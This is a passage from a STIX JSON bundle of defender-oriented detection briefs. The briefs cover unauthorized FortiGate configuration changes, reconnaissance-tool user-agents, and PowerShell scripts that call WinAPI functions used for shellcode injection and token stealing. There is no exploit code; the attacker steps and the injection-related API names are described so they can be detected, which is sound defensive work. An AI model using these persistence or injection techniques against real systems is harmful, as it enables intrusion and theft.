          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/network/fortinet/fortigate/fortinet_fortigate_user_group_modified.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--66fe504b-ff00-5c1c-b78a-8fca3b668b36",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--acf1267d-c9ae-5f63-845b-91010d7315c3",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--acf1267d-c9ae-5f63-845b-91010d7315c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FortiGate - New VPN SSL Web Portal Added",
      "description": "## Overview\n\nThis brief focuses on detecting the addition of a new VPN SSL Web Portal on Fortinet FortiGate Firewalls. FortiGate firewalls are critical network security appliances, and VPN SSL portals are key components for secure remote access. The addition of such a portal, especially when observed alongside other modifications to VPN SSL settings, is a suspicious administrative action. This behavior could indicate an attacker, having gained initial access to the FortiGate device, is attempting to establish a new, potentially covert, access vector for persistence or to facilitate continued initial access through external remote services. While this specific activity is a configuration change, it aligns with techniques used by adversaries to maintain unauthorized access or to simplify re-entry into a compromised network. Organizations should investigate such changes promptly to prevent further compromise.\n\n## Impact\n\nIf an attacker successfully adds a new VPN SSL Web Portal to a FortiGate Firewall, they could establish a persistent backdoor for unauthorized access into the internal network, bypassing existing security controls. This allows them to maintain a foothold even if their initial access method is remediated. Such unauthorized access can lead to further malicious activities, including data exfiltration, deployment of malware, lateral movement within the network, or disruption of critical services, potentially impacting data confidentiality, integrity, and availability for the entire organization.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"FortiGate - New VPN SSL Web Portal Added\" to your SIEM solution to detect suspicious configuration changes.\n*   Ensure comprehensive `fortigate` `event` logs are collected and ingested from all FortiGate devices.\n*   Investigate all alerts generated by this rule for `action: 'Add'` and `cfgpath: 'vpn.ssl.web.portal'`, verifying the legitimacy and authorization of the change.\n*   Refer to the FortiGuard PSIRT advisory `FG-IR-24-535` for related security vulnerabilities and mitigation guidance concerning FortiGate VPN SSL services.\n",
      "published": "2026-07-03T13:55:23Z",
      "labels": [
        "fortigate",
        "vpn",
        "configuration-change",
        "network-device",
        "persistence",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-24-535"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6186c77a-4140-5d9b-9871-306eb2379d3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a943ff99-51ff-51bb-a10c-0eec9974d0e4",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a943ff99-51ff-51bb-a10c-0eec9974d0e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FortiGate - New Local User Creation Detection",
      "description": "## Overview\n\nThis threat brief focuses on detecting the creation of new local users on Fortinet FortiGate firewalls, a critical indicator of potential post-compromise activity. While the creation of local users can be legitimate for administrative purposes or VPN access, malicious actors frequently abuse this capability to establish persistence within an environment, maintain access after initial exploitation, or enable unauthorized remote access via VPN. By creating a new, inconspicuous local user, attackers can circumvent existing authentication mechanisms, maintain a backdoor into the network, and potentially escalate privileges. This detection is crucial for security operations centers to identify unauthorized access attempts and potential lateral movement or persistence early in the attack lifecycle, allowing for timely incident response and mitigation.\n\n## Impact\n\nThe unauthorized creation of local users on a FortiGate firewall can lead to significant impact, including persistent access to the internal network, circumvention of multi-factor authentication, and potential lateral movement to other systems. If successful, attackers can use these newly created accounts to establish VPN connections from outside the network, bypassing perimeter defenses and gaining direct access to sensitive internal resources. This could result in data exfiltration, deployment of malware or ransomware, disruption of critical services, and further compromise of the organizational infrastructure. The primary risk is unauthorized access leading to broader system control and data breaches.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"FortiGate - New Local User Created\" to your SIEM and tune it for your environment.\n*   Investigate all alerts generated by the \"FortiGate - New Local User Created\" rule immediately to determine the legitimacy of the user creation.\n*   Review FortiGate configuration changes and audit logs for `action: 'Add'` and `cfgpath: 'user.local'` to ensure all new user accounts are authorized.\n*   Regularly audit existing local user accounts on FortiGate devices to identify any unauthorized or suspicious entries.\n",
      "published": "2026-07-03T13:54:28Z",
      "labels": [
        "network",
        "detection",
        "persistence",
        "fortigate"
      ],
      "object_refs": [
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-24-535"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/network/fortinet/fortigate/fortinet_fortigate_new_local_user_created.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f341a23d-6fd5-5b06-bf04-f101c7ae134a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0a5b183d-93fe-5242-92a9-6b9be6786523",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0a5b183d-93fe-5242-92a9-6b9be6786523",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FortiGate - New Firewall Policy Added",
      "description": "## Overview\n\nThis intelligence focuses on the detection of new firewall policies being added to Fortinet FortiGate firewalls. While the source provided is a detection rule, the underlying behavior signifies a critical activity for defenders. An adversary, having gained administrative access to a FortiGate device, may add or modify firewall policies to facilitate their objectives, such as establishing command and control (C2), enabling lateral movement, or exfiltrating data. This action directly impacts network defenses by altering traffic flow rules, potentially bypassing existing security controls, and creating new pathways for malicious activity. This detection is crucial for identifying unauthorized changes that could signal a compromise and prevent further adversarial actions within the network.\n\n## Attack Chain\n\n(The provided source is a detection rule for a specific event and does not detail a full attack chain from initial access to impact. Therefore, a complete attack chain cannot be constructed based solely on this information.)\n\n## Impact\n\nSuccessful unauthorized addition of firewall policies on FortiGate devices can lead to severe consequences. Attackers could establish new outbound connections for data exfiltration, open inbound ports for remote access or C2, or redirect internal traffic to malicious destinations, effectively bypassing network segmentation and security policies. This could result in a complete compromise of the affected network, leading to significant data breaches, system unavailability, and compliance violations. While no specific victims or sectors are mentioned in the source, any organization utilizing FortiGate devices is susceptible to this form of defense impairment if an attacker gains administrative control.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"FortiGate - New Firewall Policy Added\" to your SIEM solution to detect new firewall policy additions on FortiGate devices.\n*   Ensure FortiGate logging is configured to capture `event` service logs, specifically actions related to `cfgpath: 'firewall.policy'`, to enable the detection rule.\n*   Review any alerts generated by the \"FortiGate - New Firewall Policy Added\" rule for legitimacy. Investigate suspicious policy additions immediately to determine if they are unauthorized or malicious.\n*   Implement strong access controls and multi-factor authentication for administrative access to all FortiGate devices to prevent unauthorized configuration changes.\n",
      "published": "2026-07-03T13:53:44Z",
      "labels": [
        "defense-impairment",
        "fortigate",
        "firewall",
        "network"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-24-535"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b4b715e5-a3c1-5637-a50a-42742c899703",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of FortiGate Firewall Address Object Addition",
      "description": "## Overview\n\nThis intelligence brief focuses on the detection of new firewall address objects being added to Fortinet FortiGate firewalls. While often a routine administrative task, such additions can also signal malicious activity, particularly in a post-compromise scenario where an attacker seeks to establish persistence, enable command and control (C2), or facilitate data exfiltration by modifying network access controls. The referenced FortiGuard PSIRT advisory (FG-IR-24-535) suggests that such changes might be associated with the exploitation of a vulnerability, though specific details of the exploit chain are not provided in this context. For defenders, timely detection of unauthorized configuration changes is crucial to preventing network security bypasses and containing potential breaches on critical network infrastructure like FortiGate devices.\n\n## Impact\n\nUnauthorized addition of firewall address objects can have significant impact, enabling threat actors to undermine network segmentation and security policies. Attackers could add rules to allow inbound connections from their command and control infrastructure, permit outbound connections for data exfiltration, or open access to internal systems for lateral movement. The integrity and confidentiality of data traversing the network could be compromised, and the overall security posture of the organization could be severely degraded, potentially leading to financial losses, regulatory fines, and reputational damage. The true scale of impact depends on the specific rules added and the context of the underlying compromise, but such actions inherently increase the attack surface.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"FortiGate - Firewall Address Object Added\" to your SIEM and tune for your environment to detect unauthorized changes.\n*   Investigate all alerts generated by the \"FortiGate - Firewall Address Object Added\" rule to differentiate between legitimate administrative changes and suspicious activity.\n*   Refer to the FortiGuard PSIRT advisory FG-IR-24-535 for details on any associated vulnerabilities and apply patches or workarounds immediately.\n*   Implement robust change management processes for firewall configurations to quickly identify and cross-reference legitimate changes against detected events.\n*   Regularly review FortiGate access logs to identify suspicious logins or administrative actions that precede the addition of firewall address objects.\n",
      "published": "2026-07-03T13:53:03Z",
      "labels": [
        "fortigate",
        "network-device",
        "firewall",
        "defense-evasion"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_address_object.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-24-535"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--41223f8c-062c-55aa-9853-aa3dbceb6657",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9520aec7-20f0-5cb9-ad4f-fbdb9783e46f",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9520aec7-20f0-5cb9-ad4f-fbdb9783e46f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FortiGate - New Administrator Account Created",
      "description": "## Overview\n\nThis detection brief focuses on identifying the creation of new administrator accounts on Fortinet FortiGate firewall devices. Attackers frequently use the creation of new user accounts, particularly those with administrative privileges, as a post-exploitation technique to establish persistence and ensure continued access to compromised environments. While legitimate administrator accounts are routinely created for operational purposes, an unauthorized account creation can signify a successful breach, an insider threat, or the escalation of privileges within the network. This alert is crucial for defenders to identify suspicious activity that could lead to unauthorized configuration changes, data exfiltration, or further network compromise. The provided Sigma rule leverages FortiGate's event logs to pinpoint these critical configuration changes.\n\n## Attack Chain\n\n[The source material for this brief focuses on a specific detection capability rather than detailing a full attack chain. Therefore, a complete attack chain cannot be constructed.]\n\n## Impact\n\nIf an unauthorized administrator account is successfully created on a FortiGate firewall, attackers gain full control over the network's security perimeter. This can lead to a wide range of devastating impacts, including the disablement of security features (e.g., VPNs, IPS, antivirus), creation of rogue network access rules, redirection of traffic, exfiltration of sensitive data, or complete disruption of network services. Such an event provides attackers with a stealthy and persistent foothold, making detection and remediation significantly more challenging and potentially leading to extensive financial and reputational damage.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"FortiGate - New Administrator Account Created\" to your SIEM and tune for your environment to detect unauthorized account creations.\n*   Ensure FortiGate event logging is properly configured and integrated with your SIEM to capture `cfgpath: 'system.admin'` events.\n*   Regularly review FortiGate access logs for unusual login patterns, especially from newly created accounts.\n*   Implement multi-factor authentication for all administrative accounts on FortiGate devices.\n",
      "published": "2026-07-03T13:52:26Z",
      "labels": [
        "attack.persistence",
        "attack.t1136.001",
        "network-device",
        "fortinet"
      ],
      "object_refs": [
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-24-535"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin"
        },
        {
          "source_name": "reference",
          "url": "https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Active Scanning",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1595",
          "url": "https://attack.mitre.org/techniques/T1595"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9eeaa2f5-785b-50ce-981a-0822ba1fce49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--07568211-838d-504f-8788-eb221062f7de",
      "target_ref": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7030f7c6-48cf-53df-8d56-2bf3620bc777",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--07568211-838d-504f-8788-eb221062f7de",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--07568211-838d-504f-8788-eb221062f7de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious User-Agents Related To Recon Tools",
      "description": "## Overview\n\nThis brief details the detection of various reconnaissance and scanning tools through their characteristic User-Agent strings observed in web server logs. Attackers frequently employ open-source and commercial utilities like Nmap Scripting Engine, Nikto, SQLMap, Feroxbuster, and WPScan to automatically enumerate public-facing web applications for vulnerabilities, misconfigurations, and directory structures. This activity represents an early stage in the attack lifecycle, specifically external reconnaissance (TA0043), where adversaries gather information to identify potential entry points for initial access (TA0001) or exploit public-facing applications (T1190). Detecting these User-Agents provides an early warning signal of targeted scanning activity, allowing defenders to preemptively strengthen defenses or prepare for potential follow-on attacks by blocking or isolating the source IP addresses.\n\n## Attack Chain\n\n1.  **Attacker selects target web assets**: An attacker identifies a target organization and its externally facing web applications (e.g., web servers, APIs, content management systems).\n2.  **Attacker deploys reconnaissance tools**: Adversaries download and configure automated scanning tools like Nikto, SQLMap, Feroxbuster, gobuster, or FFUF on their attacker infrastructure.\n3.  **Tools send HTTP/S requests with specific User-Agents**: The reconnaissance tools initiate automated HTTP/S requests to the target, attempting to enumerate directories, scan for vulnerabilities, or identify web technologies. These requests often include default, distinctive User-Agent strings.\n4.  **Target web server logs suspicious User-Agents**: The target web server processes and logs the incoming HTTP/S requests, including the unique User-Agent headers associated with the reconnaissance tools.\n5.  **Attacker analyzes scan results**: The reconnaissance tools collect and process the web server's responses, identifying potential vulnerabilities, exposed directories, or interesting parameters.\n6.  **Attacker plans subsequent exploitation**: Based on the intelligence gathered during reconnaissance, the attacker formulates a plan for potential initial access or further exploitation, such as leveraging identified CVEs, sensitive directories, or authentication weaknesses.\n\n## Impact\n\nWhile reconnaissance itself does not directly result in immediate system damage or data loss, its successful execution provides attackers with crucial intelligence needed to launch more impactful attacks. The detection of these activities indicates that an organization is being actively scrutinized by potential adversaries. Failure to detect and respond to such reconnaissance can lead to subsequent exploitation, including unauthorized access, data breaches, website defacement, or disruption of services. Early detection allows for proactive defensive measures, potentially thwarting more severe security incidents.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Suspicious User-Agents Related To Recon Tools\" to your SIEM/detection platform to identify active reconnaissance.\n*   Ensure comprehensive web server logging is enabled for all public-facing applications to capture `cs-user-agent` and other relevant HTTP request fields.\n*   Investigate all alerts generated by the \"Suspicious User-Agents Related To Recon Tools\" rule as a high-priority threat.\n*   Consider implementing Web Application Firewall (WAF) rules to block or challenge requests originating from known suspicious User-Agents or IP ranges identified during investigations.\n",
      "published": "2026-07-03T13:51:37Z",
      "labels": [
        "reconnaissance",
        "web-security",
        "attack.initial-access",
        "attack.t1190"
      ],
      "object_refs": [
        "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/web/webserver_generic/web_susp_useragents.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/commixproject/commix/blob/c7f1447371524427bb30abe731235acc7386153b/src/utils/settings.py#L281"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/epi052/feroxbuster/blob/ffdf871abe0a358a1531ba4135e208d4dbe8fc31/src/config/utils.rs#L100"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/ffuf/ffuf/blob/ce3cf6bd733a24d3a9f024305234c1a6298198eb/pkg/runner/simple.go#L130"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/nmap/nmap/blob/2e47fa87469fd358ef64689d2d2de7294e385eb8/nselib/http.lua#L160"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/OJ/gobuster/blob/d20300cc46096984565e82fb73a45bf8d281b990/libgobuster/helpers.go#L124"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/sqlmapproject/sqlmap/blob/be216041e2f255ae43b050d466bd5bf92681e665/lib/core/settings.py#L29"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/sullo/nikto/blob/999670cb6a939b6c93840ce666941756e4c5dcf5/program/plugins/nikto_core.plugin#L3515"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/urbanadventurer/WhatWeb/blob/d279d93042d034f3fd29d5a893d44ccc0595d3f8/lib/whatweb.rb#L68"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/wpscanteam/wpscan/blob/4f1ce142b9768044be3e35bd0cddf1052e35efe8/lib/wpscan/browser.rb#L32"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/xmendez/wfuzz/blob/2263cd0932fef333118cd197656f709141bab615/src/wfuzz/facade.py#L43"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/zmap/zgrab2/blob/e91fc9860ca6611eb7c6fe7d2fe2be70212a37ba/modules/http/scanner.go#L54"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e44c2d88-6d3e-5ff9-980a-a838b2a086d9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--413ca380-ad1a-59aa-b92b-1e4232f0d4a5",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--91214d7c-f910-594b-9f77-6d9385867ae2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Native API",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1106",
          "url": "https://attack.mitre.org/techniques/T1106"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--276a43d0-ada8-52b1-8c8e-eaa8b4c9c46c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--413ca380-ad1a-59aa-b92b-1e4232f0d4a5",
      "target_ref": "attack-pattern--91214d7c-f910-594b-9f77-6d9385867ae2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7c7ac289-5d73-5794-b4a9-4c4398232198",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Reflective Code Loading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1620",
          "url": "https://attack.mitre.org/techniques/T1620"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70c0c3aa-f319-5d91-abc6-365397bca2ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--413ca380-ad1a-59aa-b92b-1e4232f0d4a5",
      "target_ref": "attack-pattern--7c7ac289-5d73-5794-b4a9-4c4398232198"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--413ca380-ad1a-59aa-b92b-1e4232f0d4a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Potential WinAPI Calls via PowerShell Scripts for Evasion",
      "description": "## Overview\n\nThis intelligence focuses on the detection of PowerShell scripts that make direct calls to Windows API (WinAPI) functions. This technique is frequently utilized by sophisticated adversaries to execute malicious code in memory, perform privilege escalation, or achieve persistence while evading traditional file-based and signature-based security detections. By leveraging WinAPI functions such as `VirtualAlloc`, `OpenProcess`, `WriteProcessMemory`, `CreateRemoteThread`, `OpenProcessToken`, `AdjustTokenPrivileges`, and `DuplicateTokenEx`, attackers can achieve capabilities like shellcode injection, token stealing, and process manipulation. This method allows threat actors to operate stealthily within compromised systems, making it a critical behavior for defenders to monitor. The detection of such calls is crucial as it signifies a potential attempt to bypass security measures and execute advanced attack techniques.\n\n## Impact\n\nSuccessful exploitation of systems using PowerShell scripts with direct WinAPI calls can lead to significant compromise. Adversaries can achieve advanced persistence mechanisms, elevate privileges to SYSTEM or other administrative accounts, inject malicious code into legitimate processes for stealthy execution, or exfiltrate sensitive data. The primary impact is the bypass of conventional endpoint security solutions, allowing attackers to maintain a covert presence and perform actions such as installing backdoors, deploying ransomware, or conducting extensive reconnaissance and lateral movement. The stealthy nature of these attacks makes detection challenging, increasing the dwell time and potential for severe organizational damage and data loss.\n\n## Recommendation\n\n*   Enable PowerShell Script Block Logging (Event ID 4104) on all Windows endpoints to ensure the necessary telemetry for the provided Sigma rule is collected.\n*   Deploy the Sigma rule \"Potential WinAPI Calls Via PowerShell Scripts\" to your SIEM solution to detect suspicious PowerShell activity involving WinAPI calls.\n*   Review and tune the \"Potential WinAPI Calls Via PowerShell Scripts\" rule by analyzing historical PowerShell script block logs to identify and whitelist legitimate administrative scripts that may use WinAPI functions.\n",
      "published": "2026-07-03T13:50:51Z",
      "labels": [
        "powershell",
        "winapi",
        "evasion",
        "process-injection",
        "privilege-escalation",
        "token-manipulation",
        "endpoint",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--91214d7c-f910-594b-9f77-6d9385867ae2",
        "attack-pattern--7c7ac289-5d73-5794-b4a9-4c4398232198"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/PowerShellMafia/PowerSploit/blob/1980f403ee78234eae4d93b50890d02f827a099f/CodeExecution/Invoke-Shellcode.ps1"
        },
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b00a39e8-cfdb-50d1-b54f-917a68368713",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cafa9fbb-410b-56d6-bde6-66df374703cf",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cafa9fbb-410b-56d6-bde6-66df374703cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potentially Suspicious WDAC Policy File Creation",
